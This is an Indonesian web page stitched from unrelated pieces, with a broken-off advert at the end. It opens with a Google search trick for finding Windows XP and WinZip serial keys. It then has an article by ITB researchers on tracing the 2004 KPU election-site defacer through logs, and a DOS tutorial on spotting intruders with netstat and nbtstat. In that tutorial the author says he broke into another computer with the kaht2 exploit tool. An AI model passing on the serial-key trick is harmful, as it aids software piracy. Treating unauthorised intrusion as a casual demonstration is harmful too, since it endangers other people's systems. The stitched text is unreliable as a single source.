masukkan string berikut pada google bar - "Windows XP Professional" 94FBR
94FBR adalah kode ...
atau untuk mendapatkan serial winzip 8.1 - "Winzip 8.1" 94FBR

Mengejar "Hacker" Itu Mudah

Mengejar "Hacker" Itu Mudah

JUDUL ini mungkin terlalu hiperbolis. Tapi harus diakui, isu mengenai hacker di Internet sering kali ditulis dengan gaya yang terlalu mistis, malah mendekati klenik. Keberadaan hacker di Internet dilihat media massa sebagai seorang tokoh ala Robin Hood, bebas menggondol harta penguasa tanpa bisa dikejar oleh penegak hukum, serta dapat dibuktikan perbuatannya. Apakah memang demikian adanya?

Istilah hacker biasa dipakai untuk menyebut seseorang yang memiliki keahlian khusus di bidang komputer. Seorang hacker mampu berpikir dan bekerja dengan efektif dan efisien, dan sering kali menyelesaikan permasalahan dihadapi dengan metode yang out of the box, di luar pemikiran yang biasa digunakan orang.

Lama-kelamaan arti dari istilah ini menyempit menjadi seseorang yang memiliki kemampuan lebih di bidang keamanan jaringan komputer, dan memanfaatkan kemampuannya untuk mendapatkan akses secara ilegal ke dalam sistem komputer orang lain. Jika tindakan yang dilakukan bersifat destruktif, merugikan pihak lain, istilah yang lebih tepat untuk menyebut orang seperti itu adalah cracker.

Komunitas hacker di Indonesia kebanyakan terdiri dari siswa dan mahasiswa yang memiliki ketertarikan di bidang keamanan jaringan komputer. Kelompok ini memiliki banyak waktu luang untuk mencari informasi mengenai bagaimana cara-cara yang bisa dipakai untuk memanfaatkan kelemahan yang ada pada jaringan komputer milik orang lain.

Informasi seperti ini banyak tersedia di Internet. Kadang-kadang cara yang biasa dipakai untuk masuk ini sudah disediakan dalam bentuk script yang tinggal diambil dan dijalankan, layaknya menjalankan aplikasi komputer biasa. Orang-orang yang masuk ke dalam kelompok ini sering disebut sebagai script kiddies (sebuah istilah yang menggambarkan bahwa anak kecil pun bisa melakukannya). Apa yang mereka butuhkan hanyalah informasi awal mengenai produk perangkat lunak apa dan versi berapa yang dipakai di server yang akan mereka bobol.

Komunitas hacker biasanya berkumpul secara virtual dalam chatroom di Internet. Berdiskusi mengenai hal-hal terkini dalam urusan keamanan dalam sistem komputer. Komunitas ini berkembang, anggotanya pun bertambah, kadang bisa juga berkurang. Anggotanya biasanya bertambah dari orang- orang yang ingin menjajal kemampuan mereka dalam hal ini.

Apalagi dengan kondisi usia yang sangat muda, mereka masih memiliki ego dan rasa ingin terkenal yang cukup besar. Mereka suka sekali dengan publikasi gratis dari media massa atas "hasil karya" mereka jika mereka berhasil menembus atau mengubah tampilan halaman sebuah situs di Internet.

Lain halnya ketika mereka sudah selesai menyalurkan ego gairah muda mereka. Mereka kemudian pensiun. Mereka yang sudah keluar dari komunitas ini biasanya mendapatkan pekerjaan sebagai system administrator jaringan komputer di perusahaan-perusahaan. Beberapa orang yang dianggap cukup pandai beralih menjadi konsultan keamanan sistem dan jaringan komputer, dengan bekal intuisi membobol sistem keamanan komputer yang dulu pernah mereka lakukan.

Merumuskan serangan

Seperti disebutkan tadi, gairah muda, ego, dan rasa ingin terkenal yang besar membuat mereka suka sekali diberi tantangan, bahkan acapkali mencari sendiri tantangan tersebut. Ini yang menyebabkan fenomena cracker menjadi fenomena kambuhan, tidak seperti fenomena spam atau worm virus yang kontinu sepanjang waktu.

Jika mereka ingin memasuki sistem milik orang lain, yang pertama mereka lakukan adalah dengan melakukan scanning (pemindaian, lihat Poin 1 pada grafik) terhadap sistem komputer yang mereka incar. Dengan ini mereka mendapatkan gambaran kasar mengenai sistem operasi dan aplikasi dari server sasaran. Alat yang dipakai cukup sederhana, contohnya Nmap (http://insecure.org/nmap/). Berbekal firewall yang tidak terlalu kompleks, maka tindakan scanning ini dapat diketahui oleh administrator jaringan, dan tercatat pada log firewall.

Ketika mereka sudah mengetahui sistem operasi dan aplikasi dari server tadi, mereka dapat merumuskan tipe serangan yang akan dilakukan (Poin 1). Dalam kasus pembobolan situs Komisi Pemilihan Umum (KPU), mereka mengetahui bahwa situs KPU menggunakan teknologi Microsoft Windows Server dengan web server IIS (Internet Information System), serta halaman web yang menggunakan teknologi ASP (Active Server Pages).

Nyaris tidak ada satu pun sistem yang bisa dijamin 100 persen aman, tidak memiliki kelemahan. Apalagi ketika sistem tersebut berhadapan langsung dengan akses publik, dalam hal ini Internet. Itulah kunci awalnya. Ditunjang oleh era informasi berupa fasilitas Internet yang menampung informasi dalam jumlah tak terhingga, siapa pun yang rajin dan telaten, mau meluangkan waktu, dipastikan akan mendapatkan informasi apa yang dia butuhkan.

Cukup sampai di sini? Tidak juga. Karena mereka masih harus mereka-reka struktur data seperti apa yang harus mereka ubah agar proses perubahan tertulis dengan normal. Proses mereka-reka ini bisa jadi membutuhkan waktu berhari-hari, sebelum seseorang berhasil mengetahui struktur seperti apa yang harus dimasukkan agar perubahan data berhasil.

Biasanya pula, seorang cracker yang akan melakukan serangan ini tidak terlalu bodoh. Ia harus melakukan serangan yang berhasil dalam satu tembakan, dan tembakan itu haruslah dilakukan dari tempat lain, bukan di tempat ia mengeksekusi, agar ia tidak mudah dikejar.

Maka yang dia lakukan adalah mencari sebuah server perantara, yang cukup jauh secara geografis (Poin 2) darinya, untuk melakukan serangan. Ketika server ini berhasil diakses (untuk kasus KPU, server perantara yang dipakai berada di Thailand), maka saatnya ia melakukan serangan.

Ketika serangan terjadi, maka serangan ini berhasil mengubah tampilan situs (Poin 3). . Nama-nama partai berubah menjadi nama yang aneh-aneh. Untunglah administrator Teknologi Informasi (TI) KPU cukup sigap dengan melakukan proses pembersihan pada server yang diserang.

Selain halaman web yang diserang diperbaiki strukturnya (Poin 4), firewall juga dikonfigurasi untuk menahan serangan sejenis ini (Poin 5) untuk sementara waktu. Serangan ini tercatat pula pada log (Point 6), yang memungkinkan administrator segera mengetahui dari mana serangan ini dilancarkan.

Berbekal log

Dalam "pertempuran digital" ini, senjata yang dimiliki oleh pihak yang bertahan adalah file log (catatan terhadap semua aktivitas yang terjadi di server). Log dari web server, log dari firewall, serta log dari IDS (Intrusion Detection System). Berbekal log ini, pencarian identitas sang penyerang dimulai.

Log file mencatat koneksi yang berhasil diterima atau ditolak server ataupun firewall. Log ini berisi alamat IP (Internet Protocol, alamat komputer) yang tersambung, serta waktu sambungan terjadi (Poin 7). Alamat IP di Internet berfungsi seperti alamat rumah, bersifat unik, tidak ada alamat yang sama di dunia Internet.

Dengan berbekal utilitas seperti traceroute dan whois, dengan cepat diketahui lokasi komputer tersebut dan siapa pemilik alamat IP tersebut (Poin 8), lengkap dengan contact person ISP di mana komputer tadi berada. Selanjutnya yang dibutuhkan adalah komunikasi dan koordinasi verbal dengan contact person tersebut (Poin 9).

Proses selanjutnya adalah identifikasi personal pelaku. Dengan bekal nama alias pelaku yang berhasil ditelusuri, didukung dengan adanya sistem data basis kependudukan Indonesia yang baru saja dihasilkan oleh KPU (dalam rangka pendaftaran pemilih pada Pemilu 2004), diperoleh informasi lengkap berupa tempat dan tanggal lahir serta alamat terkini tersangka.

Dengan bekal data ini beserta log kejadian pembobolan, tim TI KPU menyerahkan data ini kepada Satuan Khusus Cybercrime Polda Metro Jaya untuk diproses lebih lanjut. Cerita selanjutnya sudah dapat diketahui pada media massa. Dalam hitungan hari, tersangka dapat ditangkap.

Implikasi hukum

Aktivitas komunitas cracker ini sebenarnya hanyalah penyaluran adrenalin biasa, yang sayangnya sudah mulai masuk ruang publik dan dirasa mengganggu. Keahlian teknis yang mereka miliki pun sebenarnya tidak terlalu tinggi, yang dapat dipelajari dengan waktu luang yang cukup dan akses ke Internet. Mereka hanya kekurangan tempat praktikum untuk membuktikan ilmu yang mereka pelajari sehingga mereka mulai masuk ke ruang publik.

Sayang sekali, ketiadaan hukum membuat aktivitas mereka seakan-akan legal, padahal tidak. Coba dipikirkan, apakah Anda rela seseorang masuk ke rumah Anda dan mengacak-acak isi rumah, lalu dengan bebas keluar lagi tanpa ada yang bisa mengambil tindakan.

Parahnya, justru Anda yang disalahkan karena tidak mampu menjaga rumah dengan baik. Dalam kasus situs KPU, tindakan iseng yang dilakukan bukan hanya berakibat buruk kepada KPU, tetapi juga kepada seluruh bangsa Indonesia yang sedang melakukan hajatan besar, pemilihan umum. Untuk hal inilah sang cracker situs KPU harus dihukum seberat-beratnya karena kegiatan yang dilakukan berdampak besar kepada seluruh bangsa Indonesia. Kepada bangsa Indonesia-lah ia harus bertanggung jawab, bukan kepada KPU.

Tindakan Satuan Cybercrime Krimsus Polda Metro Jaya dalam merespons kasus ini betul-betul patut diberi acungan jempol karena mereka membuktikan komitmen mereka untuk aktif membasmi kejahatan kerah putih yang berkedok "orang iseng" dan "penyaluran adrenalin" yang nyatanya berdampak luas, mulai dari deface situs Internet sampai dengan kejahatan carding.

Untuk itulah komunitas TI seharusnya mendukung langkah Satuan Cybercrime untuk mulai membasmi pihak-pihak yang tidak bertanggung jawab ini, bukannya malah memberikan "dukungan moril" dengan melakukan promosi di media bahwa meng-hack itu mudah, meng-hack itu heroik, sistem tidak aman, dan lainnya yang secara tidak langsung malah menantang komunitas cracker untuk melakukan hal-hal yang negatif.

Kami sebagai peneliti jaringan komputer hanya berharap bahwa hukum di Indonesia mulai mampu memberikan rambu-rambu di dunia cyber sehingga akan jelas perbedaan antara seorang "anak iseng" yang kekurangan tempat penyaluran bakat dengan seorang yang melakukan tindak kejahatan. Sudah saatnya komunitas hacker menyadari bahwa tindakan mereka juga memiliki implikasi hukum, bukan lagi seperti Wild Wild West. Mereka bisa dikejar, mereka bisa ditangkap, apabila mereka melanggar ruang publik. Ini semua harus dilakukan agar dapat terbentuk kehidupan masyarakat TI Indonesia yang lebih baik.

Affan Basalamah dan Rahmat Zikri, staf peneliti jaringan komputer di Computer Network Research Group (CNRG) - ITB Bandung

MENDITEKSI PENYUSUP JARINGAN LEWAT DOS

MENDITEKSI PENYUSUP JARINGAN LEWAT DOS

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1e> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1c> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Makin berkembangnya teknologi informasi saat ini, kami juga melayani jasa perbaikan serta cleaning dan instalasi ulang berbagai merk note...